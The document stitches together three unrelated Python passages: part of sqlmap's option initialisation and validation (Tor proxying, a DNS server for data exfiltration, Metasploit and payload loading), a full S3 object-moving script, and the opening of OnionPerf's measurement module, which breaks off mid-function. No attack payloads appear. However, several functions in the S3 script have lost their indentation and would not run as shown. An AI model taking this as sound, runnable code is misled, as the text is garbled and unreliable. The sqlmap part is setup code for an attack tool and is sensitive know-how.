        lut.update((_.upper(), _) for _ in optDict[group])

    envOptions = {}
    for key, value in os.environ.items():
        if key.upper().startswith(SQLMAP_ENVIRONMENT_PREFIX):
            _ = key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper()
            if _ in lut:
                envOptions[lut[_]] = value

    # environment-provided options are normalized to proper types and applied last
    if envOptions:
        _normalizeOptions(envOptions)
        for key, value in envOptions.items():
            conf[key] = value

    mergedOptions.update(conf)
def _setTrafficOutputFP():
    """
    Opens the file used for logging raw HTTP traffic ('-t').
    """

    if not conf.trafficFile:
        return

    logger.info("setting file for logging HTTP traffic")
    conf.trafficFP = openFile(conf.trafficFile, "w+")
def _setupHTTPCollector():
    """
    Instantiates the HAR traffic collector when option '--har' is used.
    """

    if conf.harFile:
        conf.httpCollector = HTTPCollectorFactory(conf.harFile).create()
def _setDNSServer():
    """
    Spawns the DNS server instance used for DNS exfiltration
    ('--dns-domain'). Listening on privileged UDP port 53 requires
    administrator privileges.
    """

    if not conf.dnsDomain:
        return

    logger.info("setting up DNS server instance")

    if not runningAsAdmin():
        errMsg = "you need to run sqlmap as an administrator "
        errMsg += "if you want to perform a DNS data exfiltration attack "
        errMsg += "as it will need to listen on privileged UDP port 53 "
        errMsg += "for incoming address resolution attempts"
        raise SqlmapMissingPrivileges(errMsg)

    try:
        conf.dnsServer = DNSServer()
        conf.dnsServer.run()
    except socket.error as ex:
        errMsg = "there was an error while setting up "
        errMsg += "DNS server instance ('%s')" % getSafeExString(ex)
        raise SqlmapGenericException(errMsg)
def _setProxyList():
    """
    Parses the file given via option '--proxy-file' into conf.proxyList.
    """

    if not conf.proxyFile:
        return

    conf.proxyList = []
    pattern = r"(?i)((http[^:]*|socks[^:]*)://)?([\w\-.]+):(\d+)"

    for match in re.finditer(pattern, readCachedFileContent(conf.proxyFile)):
        _, scheme, address, port = match.groups()
        conf.proxyList.append("%s://%s:%s" % (scheme or "http", address, port))
def _setTorProxySettings():
    """
    Dispatches Tor proxy setup depending on the chosen '--tor-type'.
    """

    if conf.tor:
        if conf.torType == PROXY_TYPE.HTTP:
            _setTorHttpProxySettings()
        else:
            _setTorSocksProxySettings()
def _setTorHttpProxySettings():
    """
    Locates a reachable local Tor HTTP proxy port and points conf.proxy
    at it. Raises SqlmapConnectionException when none can be found.
    """

    logger.info("setting Tor HTTP proxy settings")

    candidates = (conf.torPort,) if conf.torPort else DEFAULT_TOR_HTTP_PORTS
    port = findLocalPort(candidates)

    if not port:
        errMsg = "can't establish connection with the Tor HTTP proxy. "
        errMsg += "Please make sure that you have Tor (bundle) installed and setup "
        errMsg += "so you could be able to successfully use switch '--tor' "
        raise SqlmapConnectionException(errMsg)

    conf.proxy = "http://%s:%d" % (LOCALHOST, port)

    if not conf.checkTor:
        warnMsg = "use switch '--check-tor' at "
        warnMsg += "your own convenience when accessing "
        warnMsg += "Tor anonymizing network because of "
        warnMsg += "known issues with default settings of various 'bundles' "
        warnMsg += "(e.g. Vidalia)"
        logger.warn(warnMsg)
def _setTorSocksProxySettings():
    """
    Wraps the urllib2 module with a SOCKS proxy pointing at a local Tor
    instance. Raises SqlmapConnectionException when none can be found.
    """

    logger.info("setting Tor SOCKS proxy settings")

    candidates = (conf.torPort,) if conf.torPort else DEFAULT_TOR_SOCKS_PORTS
    port = findLocalPort(candidates)

    if not port:
        errMsg = "can't establish connection with the Tor SOCKS proxy. "
        errMsg += "Please make sure that you have Tor service installed and setup "
        errMsg += "so you could be able to successfully use switch '--tor' "
        raise SqlmapConnectionException(errMsg)

    # SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29)
    proxyType = socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4
    socks.setdefaultproxy(proxyType, LOCALHOST, port)
    socks.wrapmodule(urllib2)
def _checkWebSocket():
    """
    Ensures that the third-party module 'websocket-client' is importable
    when the target URL uses the WebSocket scheme (ws:// or wss://).
    """

    # str.startswith accepts a tuple of prefixes - one call instead of an 'or' chain
    if conf.url and conf.url.startswith(("ws:/", "wss:/")):
        try:
            from websocket import ABNF
        except ImportError:
            errMsg = "sqlmap requires third-party module 'websocket-client' "
            errMsg += "in order to use WebSocket functionality"
            raise SqlmapMissingDependence(errMsg)
def _checkTor():
    """
    Verifies that traffic really goes through the Tor network by fetching
    the official Tor check page ('--check-tor').
    """

    if not conf.checkTor:
        return

    logger.info("checking Tor connection")

    try:
        page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False)
    except SqlmapConnectionException:
        page = None

    if page and 'Congratulations' in page:
        logger.info("Tor is properly being used")
    else:
        errMsg = "it appears that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'"
        raise SqlmapConnectionException(errMsg)
def _basicOptionValidation():
    """
    Checks provided options for invalid values, mutual incompatibilities
    and missing prerequisites, raising SqlmapSyntaxException (or
    SqlmapFilePathException) on the first problem found.
    """

    # numeric range checks
    if conf.limitStart is not None and not (isinstance(conf.limitStart, int) and conf.limitStart > 0):
        errMsg = "value for option '--start' (limitStart) must be an integer value greater than zero (>0)"
        raise SqlmapSyntaxException(errMsg)
    if conf.limitStop is not None and not (isinstance(conf.limitStop, int) and conf.limitStop > 0):
        errMsg = "value for option '--stop' (limitStop) must be an integer value greater than zero (>0)"
        raise SqlmapSyntaxException(errMsg)
    if conf.level is not None and not (isinstance(conf.level, int) and conf.level >= 1 and conf.level <= 5):
        errMsg = "value for option '--level' must be an integer value from range [1, 5]"
        raise SqlmapSyntaxException(errMsg)
    if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk >= 1 and conf.risk <= 3):
        errMsg = "value for option '--risk' must be an integer value from range [1, 3]"
        raise SqlmapSyntaxException(errMsg)
    if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \
       isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart:
        warnMsg = "usage of option '--start' (limitStart) which is bigger than value for --stop (limitStop) option is considered unstable"
        logger.warn(warnMsg)
    if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \
       isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar:
        errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option"
        raise SqlmapSyntaxException(errMsg)
    # mutually exclusive options/switches
    if conf.textOnly and conf.nullConnection:
        errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
        raise SqlmapSyntaxException(errMsg)
    if conf.eta and conf.verbose > defaults.verbose:
        errMsg = "switch '--eta' is incompatible with option '-v'"
        raise SqlmapSyntaxException(errMsg)
    if conf.secondUrl and conf.secondReq:
        # NOTE: dropped the stray trailing ')' previously embedded in this message
        errMsg = "option '--second-url' is incompatible with option '--second-req'"
        raise SqlmapSyntaxException(errMsg)
    if conf.direct and conf.url:
        errMsg = "option '-d' is incompatible with option '-u' ('--url')"
        raise SqlmapSyntaxException(errMsg)
    if conf.direct and conf.dbms:
        errMsg = "option '-d' is incompatible with option '--dbms'"
        raise SqlmapSyntaxException(errMsg)
    if conf.identifyWaf and conf.skipWaf:
        errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'"
        raise SqlmapSyntaxException(errMsg)
    if conf.titles and conf.nullConnection:
        errMsg = "switch '--titles' is incompatible with switch '--null-connection'"
        raise SqlmapSyntaxException(errMsg)
    if conf.dumpTable and conf.search:
        errMsg = "switch '--dump' is incompatible with switch '--search'"
        raise SqlmapSyntaxException(errMsg)
    if conf.api and not conf.configFile:
        errMsg = "switch '--api' requires usage of option '-c'"
        raise SqlmapSyntaxException(errMsg)
    if conf.data and conf.nullConnection:
        errMsg = "option '--data' is incompatible with switch '--null-connection'"
        raise SqlmapSyntaxException(errMsg)
    if conf.string and conf.nullConnection:
        errMsg = "option '--string' is incompatible with switch '--null-connection'"
        raise SqlmapSyntaxException(errMsg)
    if conf.notString and conf.nullConnection:
        errMsg = "option '--not-string' is incompatible with switch '--null-connection'"
        raise SqlmapSyntaxException(errMsg)
    if conf.tor and conf.osPwn:
        errMsg = "option '--tor' is incompatible with switch '--os-pwn'"
        raise SqlmapSyntaxException(errMsg)
    if conf.noCast and conf.hexConvert:
        errMsg = "switch '--no-cast' is incompatible with switch '--hex'"
        raise SqlmapSyntaxException(errMsg)
    if conf.dumpAll and conf.search:
        errMsg = "switch '--dump-all' is incompatible with switch '--search'"
        raise SqlmapSyntaxException(errMsg)
    if conf.string and conf.notString:
        errMsg = "option '--string' is incompatible with switch '--not-string'"
        raise SqlmapSyntaxException(errMsg)
    if conf.regexp and conf.nullConnection:
        errMsg = "option '--regexp' is incompatible with switch '--null-connection'"
        raise SqlmapSyntaxException(errMsg)
    # user-supplied regular expressions must compile
    if conf.regexp:
        try:
            re.compile(conf.regexp)
        except Exception as ex:
            errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, getSafeExString(ex))
            raise SqlmapSyntaxException(errMsg)
    if conf.crawlExclude:
        try:
            re.compile(conf.crawlExclude)
        except Exception as ex:
            errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, getSafeExString(ex))
            raise SqlmapSyntaxException(errMsg)
    if conf.dumpTable and conf.dumpAll:
        errMsg = "switch '--dump' is incompatible with switch '--dump-all'"
        raise SqlmapSyntaxException(errMsg)
    if conf.predictOutput and (conf.threads > 1 or conf.optimize):
        errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'"
        raise SqlmapSyntaxException(errMsg)
    if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"):
        errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
        raise SqlmapSyntaxException(errMsg)
    # options requiring other options
    if conf.forms and not any((conf.url, conf.googleDork, conf.bulkFile, conf.sitemapUrl)):
        errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'"
        raise SqlmapSyntaxException(errMsg)
    if conf.crawlExclude and not conf.crawlDepth:
        errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'"
        raise SqlmapSyntaxException(errMsg)
    if conf.safePost and not conf.safeUrl:
        errMsg = "option '--safe-post' requires usage of option '--safe-url'"
        raise SqlmapSyntaxException(errMsg)
    if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)):
        errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'"
        raise SqlmapSyntaxException(errMsg)
    if conf.safeReqFile and any((conf.safeUrl, conf.safePost)):
        errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'"
        raise SqlmapSyntaxException(errMsg)
    if conf.csrfUrl and not conf.csrfToken:
        errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
        raise SqlmapSyntaxException(errMsg)
    if conf.csrfToken and conf.threads > 1:
        # NOTE: message previously named the wrong option ('--csrf-url'),
        # while the condition actually checks '--csrf-token'
        errMsg = "option '--csrf-token' is incompatible with option '--threads'"
        raise SqlmapSyntaxException(errMsg)
    if conf.requestFile and conf.url and conf.url != DUMMY_URL:
        errMsg = "option '-r' is incompatible with option '-u' ('--url')"
        raise SqlmapSyntaxException(errMsg)
    if conf.direct and conf.proxy:
        errMsg = "option '-d' is incompatible with option '--proxy'"
        raise SqlmapSyntaxException(errMsg)
    if conf.direct and conf.tor:
        errMsg = "option '-d' is incompatible with switch '--tor'"
        raise SqlmapSyntaxException(errMsg)
    if not conf.tech:
        errMsg = "option '--technique' can't be empty"
        raise SqlmapSyntaxException(errMsg)
    if conf.tor and conf.ignoreProxy:
        errMsg = "switch '--tor' is incompatible with switch '--ignore-proxy'"
        raise SqlmapSyntaxException(errMsg)
    if conf.tor and conf.proxy:
        errMsg = "switch '--tor' is incompatible with option '--proxy'"
        raise SqlmapSyntaxException(errMsg)
    if conf.proxy and conf.proxyFile:
        errMsg = "switch '--proxy' is incompatible with option '--proxy-file'"
        raise SqlmapSyntaxException(errMsg)
    if conf.checkTor and not any((conf.tor, conf.proxy)):
        errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address of Tor service)"
        raise SqlmapSyntaxException(errMsg)
    if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):
        errMsg = "value for option '--tor-port' must be in range [0, 65535]"
        raise SqlmapSyntaxException(errMsg)
    if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
        errMsg = "option '--tor-type' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(PROXY_TYPE, True))
        raise SqlmapSyntaxException(errMsg)
    if conf.dumpFormat not in getPublicTypeMembers(DUMP_FORMAT, True):
        errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True))
        raise SqlmapSyntaxException(errMsg)
    if conf.skip and conf.testParameter:
        errMsg = "option '--skip' is incompatible with option '-p'"
        raise SqlmapSyntaxException(errMsg)
    if conf.mobile and conf.agent:
        errMsg = "switch '--mobile' is incompatible with option '--user-agent'"
        raise SqlmapSyntaxException(errMsg)
    if conf.proxy and conf.ignoreProxy:
        errMsg = "option '--proxy' is incompatible with switch '--ignore-proxy'"
        raise SqlmapSyntaxException(errMsg)
    if conf.timeSec < 1:
        errMsg = "value for option '--time-sec' must be a positive integer"
        raise SqlmapSyntaxException(errMsg)
    if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar):
        errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)"
        raise SqlmapSyntaxException(errMsg)
    if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.liveTest, conf.wizard, conf.dependencies, conf.purge, conf.sitemapUrl, conf.listTampers)):
        errMsg = "option '--crack' should be used as a standalone"
        raise SqlmapSyntaxException(errMsg)
    if isinstance(conf.uCols, basestring):
        if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2):
            # NOTE: fixed typo 'hyphon' -> 'hyphen' in the user-facing message
            errMsg = "value for option '--union-cols' must be a range with hyphen "
            errMsg += "(e.g. 1-10) or integer value (e.g. 5)"
            raise SqlmapSyntaxException(errMsg)
    if conf.dbmsCred and ':' not in conf.dbmsCred:
        errMsg = "value for option '--dbms-cred' must be in "
        errMsg += "format <username>:<password> (e.g. \"root:pass\")"
        raise SqlmapSyntaxException(errMsg)
    if conf.encoding:
        _ = checkCharEncoding(conf.encoding, False)
        if _ is None:
            errMsg = "unknown encoding '%s'. Please visit " % conf.encoding
            errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE
            errMsg += "supported encodings"
            raise SqlmapSyntaxException(errMsg)
        else:
            conf.encoding = _
    if conf.loadCookies:
        if not os.path.exists(conf.loadCookies):
            errMsg = "cookies file '%s' does not exist" % conf.loadCookies
            raise SqlmapFilePathException(errMsg)
def _resolveCrossReferences():
    # wires selected local functions into sibling modules at runtime,
    # presumably to avoid circular imports between those modules and
    # this one - TODO confirm against the modules' import graphs
    lib.core.threads.readInput = readInput
    lib.core.common.getPageTemplate = getPageTemplate
    lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage
    lib.request.connect.setHTTPHandlers = _setHTTPHandlers
    lib.utils.search.setHTTPHandlers = _setHTTPHandlers
    lib.controller.checks.setVerbosity = setVerbosity
    lib.controller.checks.setWafFunctions = _setWafFunctions
def initOptions(inputOptions=None, overrideOptions=False):
    """
    Initializes both configuration and knowledge base attributes and then
    merges the provided input options into the configuration.

    :param inputOptions: options object (e.g. optparse result or AttribDict)
        merged into conf; a fresh AttribDict is used when not provided.
    :param overrideOptions: when True, values from inputOptions override
        existing conf entries unconditionally.
    """

    # avoid the mutable-default-argument pitfall: the previous
    # 'inputOptions=AttribDict()' default shared one instance across all calls
    if inputOptions is None:
        inputOptions = AttribDict()

    _setConfAttributes()
    _setKnowledgeBaseAttributes()
    _mergeOptions(inputOptions, overrideOptions)
def init():
    """
    Set attributes into both configuration and knowledge base singletons
    based upon command line and configuration file options.
    """
    # option pre-processing, cleanup, environment checks and validation
    _useWizardInterface()
    setVerbosity()
    _saveConfig()
    _setRequestFromFile()
    _cleanupOptions()
    _cleanupEnvironment()
    _purge()
    _checkDependencies()
    _createTemporaryDirectory()
    _basicOptionValidation()
    # network plumbing: proxies, Tor, DNS, traffic logging
    _setProxyList()
    _setTorProxySettings()
    _setDNSServer()
    _adjustLoggingFormatter()
    _setMultipleTargets()
    _listTamperingFunctions()
    _setTamperingFunctions()
    _setWafFunctions()
    _setTrafficOutputFP()
    _setupHTTPCollector()
    _resolveCrossReferences()
    _checkWebSocket()
    parseTargetDirect()
    # target-dependent setup only runs when there is something to scan
    if any((conf.url, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.requestFile, conf.googleDork, conf.liveTest)):
        _setHostname()
        _setHTTPTimeout()
        _setHTTPExtraHeaders()
        _setHTTPCookies()
        _setHTTPReferer()
        _setHTTPHost()
        _setHTTPUserAgent()
        _setHTTPAuthentication()
        _setHTTPHandlers()
        _setDNSCache()
        _setSocketPreConnect()
        _setSafeVisit()
        _doSearch()
        _setBulkMultipleTargets()
        _setSitemapTargets()
        _checkTor()
        _setCrawler()
        _findPageForms()
        _setDBMS()
        _setTechnique()
        _setThreads()
        _setOS()
        _setWriteFile()
        _setMetasploit()
        _setDBMSAuthentication()
        loadBoundaries()
        loadPayloads()
        _setPrefixSuffix()
        update()
        _loadQueries()
|
move_file.py | #!/usr/bin/env python2
# coding: utf-8
import argparse
import errno
import logging
import os
import threading
import time
import boto3
import yaml
from botocore.client import Config
from pykit import jobq
# running counters updated by iter_file() while listing source objects
ITER_STATUS = {
    'total': 0,
    'total_size': 0,
    'marker': '',
}
# running counters updated by update_stat() as move results come back
MOVE_STATUS = {
    'total': 0,
    'total_size': 0,
}
# maps S3 ACL permission names to the matching Grant* keyword
# argument accepted by client.copy_object()
PERM_TO_ARG = {
    'READ': 'GrantRead',
    'READ_ACP': 'GrantReadACP',
    'WRITE': 'GrantWrite',
    'WRITE_ACP': 'GrantWriteACP',
    'FULL_CONTROL': 'GrantFullControl',
}
class MoveFileError(Exception):
    """Raised when copying or deleting an object fails during a move."""
    pass
def _thread(func, args):
th = threading.Thread(target=func, args=args)
th.daemon = True
th.start()
return th
def _mkdir(path):
try:
os.makedirs(path, 0755)
except OSError as e:
if e[0] == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def load_conf_from_file(path):
    """Parse the YAML configuration file at `path` and return the result."""
    with open(path) as f:
        return yaml.safe_load(f.read())
def boto_client():
    """Build an S3 client from the credentials and endpoint in the global cnf."""
    session = boto3.session.Session()
    return session.client(
        's3',
        use_ssl=False,
        aws_access_key_id=cnf['ACCESS_KEY'],
        aws_secret_access_key=cnf['SECRET_KEY'],
        config=Config(signature_version='s3v4'),
        region_name='us-east-1',
        endpoint_url=cnf['ENDPOINT'],
    )
def add_logger():
    """Attach a file handler under LOG_DIR and return the root logger."""
    log_path = os.path.join(
        cnf['LOG_DIR'], 'move-file-log-for-' + cnf['SRC_BUCKET'] + '.log')

    root = logging.getLogger()
    root.setLevel(logging.INFO)

    handler = logging.FileHandler(log_path)
    handler.setFormatter(
        logging.Formatter('[%(asctime)s, %(levelname)s] %(message)s'))
    root.addHandler(handler)

    return root
def iter_file():
    """
    Generator yielding {'key_name', 'size'} dicts for objects in
    SRC_BUCKET under OLD_PREFIX, honoring NUM_LIMIT / START_MARKER /
    END_MARKER and updating the global ITER_STATUS counters as it goes.
    """
    num_limit = cnf['NUM_LIMIT']
    start_marker = cnf['START_MARKER']
    end_marker = cnf['END_MARKER']
    prefix = cnf['OLD_PREFIX']
    marker = start_marker
    n = 0
    try:
        while True:
            # page through the listing, resuming after the last seen key
            resp = s3_client.list_objects(
                Bucket=cnf['SRC_BUCKET'],
                Marker=marker,
                Prefix=prefix,
            )
            # a page without 'Contents' means the listing is exhausted
            if 'Contents' not in resp:
                print 'list file end'
                break
            for content in resp['Contents']:
                if num_limit is not None and n >= num_limit:
                    print 'list file limit reached'
                    return
                if end_marker is not None and content['Key'] >= end_marker:
                    print 'list file end marker reached'
                    return
                marker = content['Key']
                ITER_STATUS['total'] += 1
                ITER_STATUS['total_size'] += content['Size']
                ITER_STATUS['marker'] = marker
                yield {
                    'key_name': content['Key'],
                    'size': content['Size'],
                }
                n += 1
    except Exception as e:
        # best-effort: log and stop iterating rather than crash the job queue
        logger.exception('failed to iter file: ' + repr(e))
        print 'iter file exception: ' + repr(e)
def change_key_name(old_key_name):
    """Swap the configured OLD_PREFIX of a key name for NEW_PREFIX."""
    suffix = old_key_name[len(cnf['OLD_PREFIX']):]
    return cnf['NEW_PREFIX'] + suffix
def build_grants_args(acl_resp):
    """
    Convert a get_object_acl() response into the Grant* keyword
    arguments accepted by copy_object(). Permissions without any
    grantee are omitted from the result.
    """
    permissions = ('READ', 'READ_ACP', 'WRITE', 'WRITE_ACP', 'FULL_CONTROL')

    # collect grantees per permission, split by grantee type
    grants = {}
    for perm in permissions:
        grants[perm] = {'CanonicalUser': [], 'Group': []}

    for grant in acl_resp['Grants']:
        grantee = grant['Grantee']
        bucket = grants[grant['Permission']]
        if grantee['Type'] == 'Group':
            bucket['Group'].append(grantee['URI'])
        elif grantee['Type'] == 'CanonicalUser':
            bucket['CanonicalUser'].append(grantee['ID'])

    # render each non-empty permission as a comma separated grant string
    grant_args = {}
    for permission, grantees in grants.iteritems():
        parts = ['uri="%s"' % group for group in grantees['Group']]
        parts += ['id="%s"' % user for user in grantees['CanonicalUser']]
        if parts:
            grant_args[PERM_TO_ARG[permission]] = ','.join(parts)
    return grant_args
def get_old_file_acl_grants_args(old_key_name):
    """Fetch the source object's ACL and convert it to Grant* kwargs."""
    acl_resp = s3_client.get_object_acl(
        Bucket=cnf['SRC_BUCKET'],
        Key=old_key_name,
    )
    return build_grants_args(acl_resp)
def copy_file(result):
    """
    Copy one object from SRC_BUCKET to DEST_BUCKET under its new key,
    optionally carrying the source ACL over. On failure records the
    error state in `result` and raises MoveFileError.
    """
    old_key_name = result['file_info']['key_name']
    new_key_name = change_key_name(old_key_name)

    grant_args = {}
    try:
        if cnf['COPY_ACL']:
            grant_args = get_old_file_acl_grants_args(old_key_name)
    except Exception as e:
        logger.exception('failed to get acl of file: ' + old_key_name)
        result['state'] = 'get_acl_error'
        raise MoveFileError(repr(e))

    # never forward a WRITE grant to copy_object
    grant_args.pop('GrantWrite', None)

    logger.info('copy file: %s/%s to %s/%s' %
                (cnf['SRC_BUCKET'], old_key_name,
                 cnf['DEST_BUCKET'], new_key_name))

    try:
        s3_client.copy_object(
            Bucket=cnf['DEST_BUCKET'],
            Key=new_key_name,
            CopySource='%s/%s' % (cnf['SRC_BUCKET'], old_key_name),
            **grant_args
        )
    except Exception as e:
        logger.exception('failed to copy file: ' + old_key_name)
        result['state'] = 'copy_object_error'
        raise MoveFileError(repr(e))
def delete_old_file(result):
    """
    Delete the source object after a successful copy. On failure records
    the error state in `result` and raises MoveFileError.
    """
    old_key_name = result['file_info']['key_name']

    logger.info('delete file: %s/%s' %
                (cnf['SRC_BUCKET'], old_key_name))

    try:
        s3_client.delete_object(Bucket=cnf['SRC_BUCKET'], Key=old_key_name)
    except Exception as e:
        logger.exception('failed to delete file: ' + old_key_name)
        result['state'] = 'delete_object_error'
        raise MoveFileError(repr(e))
def move_one_file(file_info):
    """
    Copy one file and, when DELETE is enabled, remove the original.
    Always returns a result dict whose 'state' entry describes the outcome.
    """
    result = {'file_info': file_info}
    try:
        copy_file(result)
        if cnf['DELETE'] == True:
            delete_old_file(result)
        result['state'] = 'succeed'
    except MoveFileError:
        # the failing step already recorded its state in `result`
        pass
    except Exception as e:
        logger.exception('got exception when move one file: ' + repr(e))
        result['state'] = 'exception'
    return result
def update_stat(result):
    """Fold one move result into the global MOVE_STATUS counters."""
    MOVE_STATUS['total'] += 1
    MOVE_STATUS['total_size'] += result['file_info']['size']

    state = result['state']
    MOVE_STATUS.setdefault(state, 0)
    MOVE_STATUS[state] += 1
def report_state():
print ('iter status: total: %d, total_size: %d, marker: %s' %
(ITER_STATUS['total'], ITER_STATUS['total_size'],
ITER_STATUS['marker']))
print 'move status: ' + repr(MOVE_STATUS)
print ''
def report(sess):
    # background loop: print progress every REPORT_INTERVAL seconds
    # until the main thread flips sess['stop'] to True
    while not sess['stop']:
        report_state()
        time.sleep(cnf['REPORT_INTERVAL'])
def move_files():
    """
    Move every object matching OLD_PREFIX from SRC_BUCKET to DEST_BUCKET
    through a thread pool, printing progress from a background thread.
    """
    # same-bucket moves with overlapping prefixes would re-list freshly
    # copied objects, so refuse them
    if cnf['SRC_BUCKET'] == cnf['DEST_BUCKET']:
        overlapping = (cnf['OLD_PREFIX'].startswith(cnf['NEW_PREFIX'])
                       or cnf['NEW_PREFIX'].startswith(cnf['OLD_PREFIX']))
        if overlapping:
            print (('error: OLD_PREFIX: %s, or NEW_PREFIX: %s, ' +
                    'should not starts with the other') %
                   (cnf['OLD_PREFIX'], cnf['NEW_PREFIX']))
            return

    sess = {'stop': False}
    report_th = _thread(report, (sess,))

    jobq.run(iter_file(),
             [(move_one_file, cnf['THREADS_NUM']),
              (update_stat, 1),
              ])

    sess['stop'] = True
    report_th.join()
    report_state()
def load_cli_args():
    """Parse command line arguments for the move-file tool."""
    parser = argparse.ArgumentParser(description='move file')

    parser.add_argument('cmd', type=str,
                        choices=['move_files', 'move_one_file'],
                        help='move one file by name or move files by prefix')

    # all optional flags are plain string overrides for conf entries
    optional = (
        ('--access_key', 'set user access key'),
        ('--secret_key', 'set user secret key'),
        ('--src_bucket', 'the bucket which the source file in'),
        ('--dest_bucket', 'the bucket which the file will be move to'),
        ('--old_prefix', ('set the old prefix when moving files by prefix, ' +
                          'set the source file name when moving one file')),
        ('--new_prefix', ('set the new prefix when moving files by prefix, ' +
                          'set the destination file name when moving one file')),
        ('--conf_path', 'set the path of the conf path'),
    )
    for flag, help_text in optional:
        parser.add_argument(flag, type=str, help=help_text)

    return parser.parse_args()
def load_conf(args):
    """
    Load the YAML conf file and override entries with any matching
    command line arguments (CLI wins; keys are upper-cased in conf).
    """
    conf = load_conf_from_file(args.conf_path or '../conf/move_file.yaml')

    overridable = ('cmd', 'access_key', 'secret_key', 'src_bucket',
                   'dest_bucket', 'old_prefix', 'new_prefix')

    for name in overridable:
        value = getattr(args, name)
        if value is not None:
            conf[name.upper()] = value

    return conf
if __name__ == "__main__":
    args = load_cli_args()
    cnf = load_conf(args)
    # log file lives under LOG_DIR; make sure the directory exists first
    _mkdir(cnf['LOG_DIR'])
    logger = add_logger()
    logger.info('args={a}'.format(a=args))
    logger.info('conf={c}'.format(c=cnf))
    s3_client = boto_client()
    if cnf['CMD'] == 'move_one_file':
        # in single-file mode OLD_PREFIX holds the full source key name
        file_info = {
            'key_name': cnf['OLD_PREFIX'],
        }
        print move_one_file(file_info)
    elif cnf['CMD'] == 'move_files':
        move_files()
|
measurement.py | '''
OnionPerf
Authored by Rob Jansen, 2015
See LICENSE for licensing information
'''
import os, traceback, subprocess, threading, Queue, logging, time, datetime, re, shlex
from lxml import etree
# stem imports
from stem.util import str_tools
from stem.control import Controller
from stem.version import Version, Requirement, get_system_tor_version
from stem import __version__ as stem_version
# onionperf imports
import analysis, monitor, model, util
def generate_docroot_index(docroot_path):
    # regenerates '<docroot>/index.xml' with one <file name="..."/> entry
    # for every regular file currently present in the docroot
    root = etree.Element("files")
    filepaths = [f for f in os.listdir(docroot_path) if os.path.isfile(os.path.abspath('/'.join([docroot_path, f])))]
    for filename in filepaths:
        e = etree.SubElement(root, "file")
        e.set("name", filename)
    # Python 2 chevron-print writes the serialized tree into the file handle
    with open("{0}/index.xml".format(docroot_path), 'wb') as f: print >> f, etree.tostring(root, pretty_print=True, xml_declaration=True)
def readline_thread_task(instream, q):
    """Forward every line from instream into queue q until EOF."""
    line = instream.readline()
    while line != b'':
        q.put(line)
        line = instream.readline()
def watchdog_thread_task(cmd, cwd, writable, done_ev, send_stdin, ready_search_str, ready_ev):
    """
    Supervises a subprocess: runs `cmd` in `cwd`, streams its stdout into
    `writable`, and relaunches it whenever it dies, until `done_ev` is set
    or more than 10 failures pile up within one hour. Optionally feeds
    `send_stdin` to the child and sets `ready_ev` once `ready_search_str`
    is seen in the child's output.
    """
    # launch or re-launch our sub process until we are told to stop
    # if we fail too many times in too short of time, give up and exit
    failure_times = []
    pause_time_seconds = 0
    while done_ev.is_set() is False:
        # back off before relaunching after a failure (0 on the first run)
        if pause_time_seconds > 0:
            time.sleep(pause_time_seconds)
        stdin_handle = subprocess.PIPE if send_stdin is not None else None
        subp = subprocess.Popen(shlex.split(cmd), cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=stdin_handle)
        # send some data to stdin if requested
        if send_stdin is not None:
            subp.stdin.write(send_stdin)
            subp.stdin.close()
        # wait for a string to appear in stdout if requested
        if ready_search_str is not None:
            boot_re = re.compile(ready_search_str)
            for line in iter(subp.stdout.readline, b''):
                writable.write(line)
                if boot_re.search(line):
                    break  # got it!
        # now the process is running *and* 'ready'
        if ready_ev is not None:
            ready_ev.set()
        # a helper will block on stdout and return lines back to us in a queue
        stdout_q = Queue.Queue()
        t = threading.Thread(target=readline_thread_task, args=(subp.stdout, stdout_q))
        t.start()
        # collect output from the helper and write it, continuously checking to make
        # sure that the subprocess is still alive and the master doesn't want us to quit
        while subp.poll() is None and done_ev.is_set() is False:
            try:
                # collect lines until the queue is empty for a full second
                while True:
                    line = stdout_q.get(True, 1)
                    writable.write(line)
            except Queue.Empty:
                # the queue is empty and the get() timed out, recheck loop conditions
                continue
        # either the process died, or we should shut down gracefully
        # if the process is still running, stop it
        if subp.poll() is None:
